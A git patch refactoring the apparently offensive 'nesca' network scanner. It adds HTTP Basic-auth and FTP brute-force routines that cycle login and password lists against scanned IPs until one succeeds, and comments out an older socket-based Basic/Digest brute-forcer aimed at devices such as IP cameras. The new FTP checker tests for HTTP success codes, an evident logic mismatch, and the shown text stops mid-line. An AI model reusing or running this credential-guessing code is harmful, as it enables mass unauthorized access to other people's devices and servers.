From 235db2182910b0f7b1575852955a4b2e8f7271f9 Mon Sep 17 00:00:00 2001 From: cora48 Date: Mon, 16 Mar 2015 17:29:34 +0300 Subject: [PATCH] FTP & BA refactoring --- BasicAuth.cpp | 55 +- BasicAuth.h | 17 +- Connector.cpp | 34 +- Connector.h | 5 +- FTPAuth.cpp | 62 ++ FTPAuth.h | 19 + connector_old.cpp | 1701 ++++++++++++++++++++--------------------- externData.h | 2 +- finder.cpp | 335 +++----- mainResources.h | 25 +- msgcheckerthread.cpp | 10 +- nesca.pro | 6 +- nesca_3.cpp | 10 +- nesca_startModule.cpp | 11 +- 14 files changed, 1112 insertions(+), 1180 deletions(-) create mode 100644 FTPAuth.cpp create mode 100644 FTPAuth.h diff --git a/BasicAuth.cpp b/BasicAuth.cpp index f99ff97..73c84b0 100644 --- a/BasicAuth.cpp +++ b/BasicAuth.cpp @@ -1,24 +1,55 @@ #include -lopaStr BA::_BABrute(char *cookie, - char *ip, - int port, - char *pathT, - char *method) -{ +bool BA::checkOutput(const string *buffer) { + if(Utils::ci_find_substr(*buffer, "200 ok") != -1 || + Utils::ci_find_substr(*buffer, "http/1.0 200") != -1 || + Utils::ci_find_substr(*buffer, "http/1.1 200") != -1 + ) { + return true; + } + + return false; } -lopaStr BA::_BALobby(char *cookie, - char *ip, - int port, - char *path, - char *method) +lopaStr BA::_BABrute(const char *ip, const int port) { + string buffer; + string lpString; + lopaStr lps; + ZeroMemory(lps.login, sizeof(lps.login)); + ZeroMemory(lps.pass, sizeof(lps.pass)); + ZeroMemory(lps.other, sizeof(lps.other)); + + strcpy(lps.login, "UNKNOWN"); + + for(int i = 0; i < MaxLogin; ++i) { + if(!globalScanFlag) return lps; + for (int j = 0; j < MaxPass; ++j) { + if (!globalScanFlag) return lps; + + lpString = string(loginLst[i]) + ":" + string(passLst[j]); + + Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString); + + if(checkOutput(&buffer) != 0) { + strcpy(lps.login, loginLst[i]); + strcpy(lps.pass, passLst[j]); + return lps; + }; + + Sleep(70); + } + } + + return lps; +} + +lopaStr BA::_BALobby(const char *ip, const int port) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(700); BruteUtils::BConInc(); - lopaStr res = _BABrute(cookie, ip, port, path, method); + const lopaStr &res = _BABrute(ip, port); BruteUtils::BConDec(); return res; diff --git a/BasicAuth.h b/BasicAuth.h index 70ec150..56046f0 100644 --- a/BasicAuth.h +++ b/BasicAuth.h @@ -1,22 +1,19 @@ #ifndef BASICAUTH_H #define BASICAUTH_H +#include #include +#include +#include #include class BA : BruteUtils{ private: - lopaStr _BABrute(char *cookie, - char *ip, - int port, - char *pathT, - char *method); + static bool checkOutput(const string *buffer); + static lopaStr _BABrute(const char *ip, const int port); - lopaStr _BALobby(char *cookie, - char *ip, - int port, - char *path, - char *method); +public: + static lopaStr _BALobby(const char *ip, const int port); }; #endif // BASICAUTH_H diff --git a/Connector.cpp b/Connector.cpp index 38297a9..58ec71c 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -172,7 +172,6 @@ int _EstablishSSHConnection(char *host, int port, std::string *buffer, const cha char login[32] = {0}; char pass[32] = {0}; char temp[64] = {0}; - isActive = 1; BruteUtils::BConInc(); int sz = 0; char *ptr1 = 0; @@ -193,19 +192,16 @@ int _EstablishSSHConnection(char *host, int port, std::string *buffer, const cha { if(i == 0) return -2; //Failhit BruteUtils::BConDec(); - isActive = 0; return 1; } else if(res == -2) { BruteUtils::BConDec(); - isActive = 0; return -2; }; Sleep(500); }; BruteUtils::BConDec(); - isActive = 0; return -1; } @@ -232,9 +228,11 @@ int my_trace(CURL *handle, curl_infotype type, void *userp) { switch (type) { - case CURLINFO_HEADER_OUT: - data[strstr(data, "\r\n\r\n") - data] = '\0'; - stt->doEmitionAddOutData(QString(data)); + case CURLINFO_HEADER_OUT: { + data[strstr(data, "\r\n\r\n") - data] = '\0'; + stt->doEmitionAddOutData(QString(data)); + break; + } } return 0; @@ -248,22 +246,25 @@ static size_t nWriteCallback(void *contents, size_t size, size_t nmemb, void *us int Connector::nConnect(const char *ip, const int port, std::string *buffer, const char *postData, - const std::vector *customHeaders){ - + const std::vector *customHeaders, + const std::string *lpString){ + buffer->clear(); CURL *curl = curl_easy_init(); + curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L); if (curl) { if (MapWidgetOpened) { struct data config; config.trace_ascii = 1; /* enable ascii tracing */ - curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); - curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); - curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); + curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); + curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); + curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_URL, ip); curl_easy_setopt(curl, CURLOPT_PORT, port); - curl_easy_setopt(curl, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); + curl_easy_setopt(curl, CURLOPT_USERAGENT, + "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); curl_easy_setopt(curl, CURLOPT_HEADER, 1L); curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); @@ -296,14 +297,19 @@ int Connector::nConnect(const char *ip, const int port, std::string *buffer, curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk); } + if(lpString != NULL) { + curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_ANY); + curl_easy_setopt(curl, CURLOPT_USERPWD, lpString); + }; + curl_easy_perform(curl); - if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); curl_easy_cleanup(curl); } else { stt->doEmitionRedFoundData("Curl error."); return -1; }; + if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); return buffer->size(); } int Connector::_ConnectToPort(char *ip, int port, char *hl) diff --git a/Connector.h b/Connector.h index 0fa3fee..2d4194b 100644 --- a/Connector.h +++ b/Connector.h @@ -18,8 +18,9 @@ class Connector { public: static int nConnect(const char *ip, const int port, std::string *buffer, - const char *postData = NULL, - const std::vector *customHeaders = NULL); + const char *postData = NULL, + const std::vector *customHeaders = NULL, + const string *lpString = NULL); static int _ConnectToPort(char *ip, int port, char *hl); static int _SSHLobby(char *ip, int port, std::string *buffer); }; diff --git a/FTPAuth.cpp b/FTPAuth.cpp new file mode 100644 index 0000000..401b002 --- /dev/null +++ b/FTPAuth.cpp @@ -0,0 +1,62 @@ +#include "FTPAuth.h" + +bool FTPA::checkOutput(const string *buffer) { + //Login or password incorrect! + + if(Utils::ci_find_substr(*buffer, "200 ok") != -1 || + Utils::ci_find_substr(*buffer, "http/1.0 200") != -1 || + Utils::ci_find_substr(*buffer, "http/1.1 200") != -1 + ) { + + return true; + } + + return false; +} + +lopaStr FTPA::_FTPBrute(const char *ip, const int port, const PathStr *ps) { + string buffer; + string lpString; + lopaStr lps; + ZeroMemory(lps.login, sizeof(lps.login)); + ZeroMemory(lps.pass, sizeof(lps.pass)); + ZeroMemory(lps.other, sizeof(lps.other)); + + strcpy(lps.login, "UNKNOWN"); + + for(int i = 0; i < MaxLogin; ++i) + { + if(!globalScanFlag) return lps; + if(strlen(loginLst[i]) <= 1) continue; + + for(int j = 0; j < MaxPass; ++j) + { + if(!globalScanFlag) return lps; + if(strlen(passLst[j]) <= 1) continue; + + lpString = string(loginLst[i]) + ":" + string(passLst[j]); + + Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString); + + if(checkOutput(&buffer) != 0) { + strcpy(lps.login, loginLst[i]); + strcpy(lps.pass, passLst[j]); + return lps; + }; + + Sleep(70); + } + } + + return lps; +} + +lopaStr FTPA::_FTPLobby(const char *ip, const int port, const PathStr *ps){ + while(BrutingThrds >= gMaxBrutingThreads) Sleep(700); + + BruteUtils::BConInc(); + const lopaStr &lps = _FTPBrute(ip, port, ps); + BruteUtils::BConDec(); + + return lps; +} diff --git a/FTPAuth.h b/FTPAuth.h new file mode 100644 index 0000000..059a553 --- /dev/null +++ b/FTPAuth.h @@ -0,0 +1,19 @@ +#ifndef FTPAUTH_H +#define FTPAUTH_H + +#include +#include +#include +#include +#include + +class FTPA { + private: + static bool checkOutput(const string *buffer); + static lopaStr _FTPBrute(const char *ip, const int port, const PathStr *ps); + + public: + static lopaStr _FTPLobby(const char *ip, const int port, const PathStr *ps); +}; + +#endif // FTPAUTH_H diff --git a/connector_old.cpp b/connector_old.cpp index 026f9d0..ccfb33b 100644 --- a/connector_old.cpp +++ b/connector_old.cpp @@ -357,961 +357,943 @@ char *_makeDigestResponse( return (char*)responseMD5; } -lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) -{ - if(strcmp(method, "[DIGEST]") != 0 && strcmp(method, "[NORMAL]") != 0) stt->doEmitionRedFoundData("[-] Unknown method IP: " + QString(ip) + ":" + QString::number(port) + + ""); - lopaStr lps; - ZeroMemory(lps.login, sizeof(lps.login)); - ZeroMemory(lps.pass, sizeof(lps.pass)); - ZeroMemory(lps.other, sizeof(lps.other)); +//lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) +//{ +// if(strcmp(method, "[DIGEST]") != 0 && strcmp(method, "[NORMAL]") != 0) stt->doEmitionRedFoundData("[-] Unknown method IP: " + QString(ip) + ":" + QString::number(port) + + ""); +// lopaStr lps; +// ZeroMemory(lps.login, sizeof(lps.login)); +// ZeroMemory(lps.pass, sizeof(lps.pass)); +// ZeroMemory(lps.other, sizeof(lps.other)); - int cookieLen = strlen(cookie); - char path[512] = {0}; - strncpy(path, pathT, 512); +// int cookieLen = strlen(cookie); +// char path[512] = {0}; +// strncpy(path, pathT, 512); - int bTO; - bool goon = false; - char hRqst[REQUEST_MAX_SIZE] = {0}; - char headerMsg[REQUEST_MAX_SIZE] = { 0 }; - char hMsgR[512] = {0}; +// int bTO; +// bool goon = false; +// char hRqst[REQUEST_MAX_SIZE] = {0}; +// char headerMsg[REQUEST_MAX_SIZE] = { 0 }; +// char hMsgR[512] = {0}; - strcpy(hRqst, "GET "); - strcat(hRqst, path); - strcat(hRqst, " HTTP/1.1\r\nHost: "); - strcat(hRqst, ip); +// strcpy(hRqst, "GET "); +// strcat(hRqst, path); +// strcat(hRqst, " HTTP/1.1\r\nHost: "); +// strcat(hRqst, ip); - if(port != 80){ - strcat(hRqst, ":"); - char tbuff[16] = {0}; - sprintf(tbuff, "%d", port); - strcat(hRqst, tbuff); - }; +// if(port != 80){ +// strcat(hRqst, ":"); +// char tbuff[16] = {0}; +// sprintf(tbuff, "%d", port); +// strcat(hRqst, tbuff); +// }; - if(cookieLen != 0) - { - strcat(hRqst, "\r\nCookie: "); - strcat(hRqst, cookie); - }; - strcat(hRqst, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic bG9sa2E6bG9sa2F=\r\n\r\n"); +// if(cookieLen != 0) +// { +// strcat(hRqst, "\r\nCookie: "); +// strcat(hRqst, cookie); +// }; +// strcat(hRqst, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic bG9sa2E6bG9sa2F=\r\n\r\n"); - sockaddr_in sockAddr; - if(port == 443) - { - ZeroMemory(headerMsg, REQUEST_MAX_SIZE); - _baSSLWorker(ip, hRqst, headerMsg); - } +// sockaddr_in sockAddr; +// if(port == 443) +// { +// ZeroMemory(headerMsg, REQUEST_MAX_SIZE); +// _baSSLWorker(ip, hRqst, headerMsg); +// } - else - { - SOCKET sock; - sockAddr.sin_family = AF_INET; - sockAddr.sin_port = htons(port); - HOSTENT *host; -#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) - if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip); - else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; - else - { - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - }; -#else - if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip); - else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; - else - { - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - }; -#endif - sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); - if(sock != INVALID_SOCKET) { +// else +// { +// SOCKET sock; +// sockAddr.sin_family = AF_INET; +// sockAddr.sin_port = htons(port); +// HOSTENT *host; +//#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) +// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip); +// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; +// else +// { +// isActive = 0; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; +//#else +// if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip); +// else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; +// else +// { +// isActive = 0; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; +//#endif +// sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); +// if(sock != INVALID_SOCKET) { - if(connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) != SOCKET_ERROR) { +// if(connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) != SOCKET_ERROR) { - if(send(sock, hRqst, strlen(hRqst), 0) != SOCKET_ERROR) { +// if(send(sock, hRqst, strlen(hRqst), 0) != SOCKET_ERROR) { - if(MapWidgetOpened) stt->doEmitionAddOutData(QString(hRqst)); - ZeroMemory(headerMsg, REQUEST_MAX_SIZE); - int x = 1; - int xx = 0; +// if(MapWidgetOpened) stt->doEmitionAddOutData(QString(hRqst)); +// ZeroMemory(headerMsg, REQUEST_MAX_SIZE); +// int x = 1; +// int xx = 0; - while (xx < REQUEST_MAX_SIZE) - { - x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 5, &bTO); - if(x <= 0) break; - strncat(headerMsg, hMsgR, x); - xx += x; - ZeroMemory(hMsgR, sizeof(hMsgR)); - }; +// while (xx < REQUEST_MAX_SIZE) +// { +// x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 5, &bTO); +// if(x <= 0) break; +// strncat(headerMsg, hMsgR, x); +// xx += x; +// ZeroMemory(hMsgR, sizeof(hMsgR)); +// }; - if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(headerMsg)); - } else { - if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Send]: " + QString::number(WSAGetLastError())); - }; - } else { - if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Connect]: " + QString::number(WSAGetLastError())); - }; - } else { - if(gDebugMode) stt->doEmitionDebugFoundData("[BA: Invalid socket]: " + QString::number(WSAGetLastError())); - }; - CSSOCKET(sock); - }; +// if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(headerMsg)); +// } else { +// if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Send]: " + QString::number(WSAGetLastError())); +// }; +// } else { +// if(gDebugMode) stt->doEmitionDebugFoundData("[BA::Connect]: " + QString::number(WSAGetLastError())); +// }; +// } else { +// if(gDebugMode) stt->doEmitionDebugFoundData("[BA: Invalid socket]: " + QString::number(WSAGetLastError())); +// }; +// CSSOCKET(sock); +// }; - if(strlen(headerMsg) == 0) - { - isActive = 0; +// if(strlen(headerMsg) == 0) +// { +// isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - }; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; - if(strstr(headerMsg, "401 ") == NULL - && strstr(headerMsg, ".1 401") == NULL - && strstr(headerMsg, ".0 401") == NULL - && strstr(headerMsg, "401") == NULL - && strstr(headerMsg, "Unauthorized") == NULL - && strstr(headerMsg, "неправильны") == NULL && strstr(headerMsg, "Неправильны") == NULL - && strstr(headerMsg, "Неправильны") == NULL - ) - { - if(strstri(headerMsg, "400 Bad") != NULL) - { - strcpy(lps.other, "[400 Bad Request]"); - isActive = 0; - return lps; - } - else if(strstri(headerMsg, "404 Not") != NULL - || strstr(headerMsg, "404 ") != NULL - || strstr(headerMsg, ".1 404") != NULL - || strstr(headerMsg, ".0 404") != NULL - ) - { - if(strstr(path, "/axis-cgi/com/ptz.cgi?") != NULL) - { - int sz = strlen("/view/viewer_index.shtml"); - strncpy(path, "/view/viewer_index.shtml", sz); - memset(path + sz, 0, 1); - goon = true; - } - else - { - strcpy(lps.other, QString("[404 Not Found (" + QString(path) + ")]").toLocal8Bit().data()); - isActive = 0; - return lps; - }; - } - else if( // - (strstr(headerMsg, ".1 403") != NULL // - || strstr(headerMsg, ".0 403") != NULL //Hikkvision2 - ) // - && strstr(headerMsg, "badAuthorization") != NULL // - ) - { - goon = true; - } - else if(strlen(headerMsg) < 16) - { - goon = true; - stt->doEmitionRedFoundData("Corrupted reply: (" + QString(headerMsg) + ") " + QString(ip) + ":"+ QString::number(port)); - }; +// if(strstr(headerMsg, "401 ") == NULL +// && strstr(headerMsg, ".1 401") == NULL +// && strstr(headerMsg, ".0 401") == NULL +// && strstr(headerMsg, "401") == NULL +// && strstr(headerMsg, "Unauthorized") == NULL +// && strstr(headerMsg, "неправильны") == NULL && strstr(headerMsg, "Неправильны") == NULL +// && strstr(headerMsg, "Неправильны") == NULL +// ) +// { +// if(strstri(headerMsg, "400 Bad") != NULL) +// { +// strcpy(lps.other, "[400 Bad Request]"); +// isActive = 0; +// return lps; +// } +// else if(strstri(headerMsg, "404 Not") != NULL +// || strstr(headerMsg, "404 ") != NULL +// || strstr(headerMsg, ".1 404") != NULL +// || strstr(headerMsg, ".0 404") != NULL +// ) +// { +// if(strstr(path, "/axis-cgi/com/ptz.cgi?") != NULL) +// { +// int sz = strlen("/view/viewer_index.shtml"); +// strncpy(path, "/view/viewer_index.shtml", sz); +// memset(path + sz, 0, 1); +// goon = true; +// } +// else +// { +// strcpy(lps.other, QString("[404 Not Found (" + QString(path) + ")]").toLocal8Bit().data()); +// isActive = 0; +// return lps; +// }; +// } +// else if( // +// (strstr(headerMsg, ".1 403") != NULL // +// || strstr(headerMsg, ".0 403") != NULL //Hikkvision2 +// ) // +// && strstr(headerMsg, "badAuthorization") != NULL // +// ) +// { +// goon = true; +// } +// else if(strlen(headerMsg) < 16) +// { +// goon = true; +// stt->doEmitionRedFoundData("Corrupted reply: (" + QString(headerMsg) + ") " + QString(ip) + ":"+ QString::number(port)); +// }; - if(goon == false) - { - strcpy(lps.login, "NULL"); - strcpy(lps.pass, "NULL"); - isActive = 0; - return lps; - }; - }; +// if(goon == false) +// { +// strcpy(lps.login, "NULL"); +// strcpy(lps.pass, "NULL"); +// isActive = 0; +// return lps; +// }; +// }; - isActive = 1; - char tPass[256] = {0}; - char curLogin[256] = {0}; - char curPass[256] = {0}; - int cCode; - int dataSz = 0; - char request[REQUEST_MAX_SIZE] = {0}; - char recvBuff[4096] = {0}; - char recvBuff2[512] = {0}; - char pass[256] = {0}; +// isActive = 1; +// char tPass[256] = {0}; +// char curLogin[256] = {0}; +// char curPass[256] = {0}; +// int cCode; +// int dataSz = 0; +// char request[REQUEST_MAX_SIZE] = {0}; +// char recvBuff[4096] = {0}; +// char recvBuff2[512] = {0}; +// char pass[256] = {0}; - char localBuff[4096] = {0}; - strcpy(localBuff, headerMsg); - int passCounter = 1; - char attribute[2048] = {0}; - char nonce[512] = {0}; - char realm[512] = {0}; - char opaque[512] = {0}; - char qop[64] = {0}; - std::string encoded = ""; +// char localBuff[4096] = {0}; +// strcpy(localBuff, headerMsg); +// int passCounter = 1; +// char attribute[2048] = {0}; +// char nonce[512] = {0}; +// char realm[512] = {0}; +// char opaque[512] = {0}; +// char qop[64] = {0}; +// std::string encoded = ""; - for(int i = 0; i < MaxLogin; i++) - { - if(globalScanFlag == false) break; - for (int j = 0; j < MaxPass; j++) - { - if (globalScanFlag == false) break; +// for(int i = 0; i < MaxLogin; i++) +// { +// if(globalScanFlag == false) break; +// for (int j = 0; j < MaxPass; j++) +// { +// if (globalScanFlag == false) break; - ZeroMemory(request, REQUEST_MAX_SIZE); - ZeroMemory(curLogin, sizeof(curLogin)); - ZeroMemory(curPass, sizeof(curPass)); - strcpy(curLogin, loginLst[i]); - strcpy(curPass, passLst[j]); +// ZeroMemory(request, REQUEST_MAX_SIZE); +// ZeroMemory(curLogin, sizeof(curLogin)); +// ZeroMemory(curPass, sizeof(curPass)); +// strcpy(curLogin, loginLst[i]); +// strcpy(curPass, passLst[j]); - if (strcmp(method, "[DIGEST]") == 0 && strstr(localBuff, "nonce=") != NULL) - { - ZeroMemory(attribute, sizeof(attribute)); -// strcpy(attribute, _getAttribute(localBuff, "WWW-Authenticate:")); - ZeroMemory(nonce, sizeof(nonce)); - strcpy(nonce, _getAttributeValue(attribute, "nonce=", ip, port)); - ZeroMemory(realm, sizeof(realm)); - strcpy(realm, _getAttributeValue(attribute, "realm=", ip, port)); - ZeroMemory(qop, sizeof(qop)); - if (strstri(attribute, "qop") != NULL) - { - strcpy(qop, _getAttributeValue(attribute, "qop=", ip, port)); - }; +// if (strcmp(method, "[DIGEST]") == 0 && strstr(localBuff, "nonce=") != NULL) +// { +// ZeroMemory(attribute, sizeof(attribute)); +//// strcpy(attribute, _getAttribute(localBuff, "WWW-Authenticate:")); +// ZeroMemory(nonce, sizeof(nonce)); +// strcpy(nonce, _getAttributeValue(attribute, "nonce=", ip, port)); +// ZeroMemory(realm, sizeof(realm)); +// strcpy(realm, _getAttributeValue(attribute, "realm=", ip, port)); +// ZeroMemory(qop, sizeof(qop)); +// if (strstri(attribute, "qop") != NULL) +// { +// strcpy(qop, _getAttributeValue(attribute, "qop=", ip, port)); +// }; - strcpy(request, "GET "); - strcat(request, path); - strcat(request, " HTTP/1.1\r\nHost: "); - strcat(request, ip); - if (port != 80){ - strcat(request, ":"); - char tbuff[16] = { 0 }; - sprintf(tbuff, "%d", port); - strcat(request, tbuff); - }; - if (cookieLen != 0) - { - strcat(request, "\r\nCookie: "); - strcat(request, cookie); - }; +// strcpy(request, "GET "); +// strcat(request, path); +// strcat(request, " HTTP/1.1\r\nHost: "); +// strcat(request, ip); +// if (port != 80){ +// strcat(request, ":"); +// char tbuff[16] = { 0 }; +// sprintf(tbuff, "%d", port); +// strcat(request, tbuff); +// }; +// if (cookieLen != 0) +// { +// strcat(request, "\r\nCookie: "); +// strcat(request, cookie); +// }; - strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Digest username=\""); - strcat(request, curLogin); - strcat(request, "\", realm=\""); - strcat(request, realm); - strcat(request, "\", nonce=\""); - strcat(request, nonce); - strcat(request, "\", uri=\""); - strcat(request, path); - strcat(request, "\", qop=auth, response=\""); - strcat(request, _makeDigestResponse(curLogin, realm, curPass, path, nonce, "10000001", "9d531d56796e0dc9", qop)); - if (strstri(attribute, "opaque") != NULL) - { - ZeroMemory(opaque, sizeof(opaque)); - strcpy(opaque, _getAttributeValue(attribute, "opaque=", ip, port)); - strcat(request, "\", opaque=\""); - strcat(request, opaque); - }; - strcat(request, "\", nc=10000001, cnonce=\"9d531d56796e0dc9\""); - strcat(request, "\r\nConnection: close\r\n\r\n"); - } - else - { - ZeroMemory(tPass, sizeof(tPass)); - strncpy(tPass, curLogin, strlen(curLogin)); - strcat(tPass, ":"); - strncat(tPass, curPass, strlen(curPass)); - encoded = base64_encode((const unsigned char *)tPass, strlen(tPass)); - strcpy(request, "GET "); - strcat(request, path); - strcat(request, " HTTP/1.1\r\nHost: "); - strcat(request, ip); - if (port != 80){ - strcat(request, ":"); - char tbuff[16] = { 0 }; - sprintf(tbuff, "%d", port); - strcat(request, tbuff); - }; - if (cookieLen != 0) - { - strcat(request, "\r\nCookie: "); - strcat(request, cookie); - }; +// strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Digest username=\""); +// strcat(request, curLogin); +// strcat(request, "\", realm=\""); +// strcat(request, realm); +// strcat(request, "\", nonce=\""); +// strcat(request, nonce); +// strcat(request, "\", uri=\""); +// strcat(request, path); +// strcat(request, "\", qop=auth, response=\""); +// strcat(request, _makeDigestResponse(curLogin, realm, curPass, path, nonce, "10000001", "9d531d56796e0dc9", qop)); +// if (strstri(attribute, "opaque") != NULL) +// { +// ZeroMemory(opaque, sizeof(opaque)); +// strcpy(opaque, _getAttributeValue(attribute, "opaque=", ip, port)); +// strcat(request, "\", opaque=\""); +// strcat(request, opaque); +// }; +// strcat(request, "\", nc=10000001, cnonce=\"9d531d56796e0dc9\""); +// strcat(request, "\r\nConnection: close\r\n\r\n"); +// } +// else +// { +// ZeroMemory(tPass, sizeof(tPass)); +// strncpy(tPass, curLogin, strlen(curLogin)); +// strcat(tPass, ":"); +// strncat(tPass, curPass, strlen(curPass)); +// encoded = base64_encode((const unsigned char *)tPass, strlen(tPass)); +// strcpy(request, "GET "); +// strcat(request, path); +// strcat(request, " HTTP/1.1\r\nHost: "); +// strcat(request, ip); +// if (port != 80){ +// strcat(request, ":"); +// char tbuff[16] = { 0 }; +// sprintf(tbuff, "%d", port); +// strcat(request, tbuff); +// }; +// if (cookieLen != 0) +// { +// strcat(request, "\r\nCookie: "); +// strcat(request, cookie); +// }; - strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic "); - strcat(request, encoded.c_str()); - strcat(request, "\r\nConnection: close\r\n\r\n"); - }; +// strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nAuthorization: Basic "); +// strcat(request, encoded.c_str()); +// strcat(request, "\r\nConnection: close\r\n\r\n"); +// }; - if (port == 443) - { - ZeroMemory(recvBuff, sizeof(recvBuff)); - if (BALogSwitched) stt->doEmitionBAData("Probing SSL:BA " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(tPass) + ";"); - _baSSLWorker(ip, request, recvBuff); - dataSz = strlen(recvBuff); - } +// if (port == 443) +// { +// ZeroMemory(recvBuff, sizeof(recvBuff)); +// if (BALogSwitched) stt->doEmitionBAData("Probing SSL:BA " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(tPass) + ";"); +// _baSSLWorker(ip, request, recvBuff); +// dataSz = strlen(recvBuff); +// } - else - { - SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); +// else +// { +// SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); +// cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); - if (cCode == SOCKET_ERROR) { +// if (cCode == 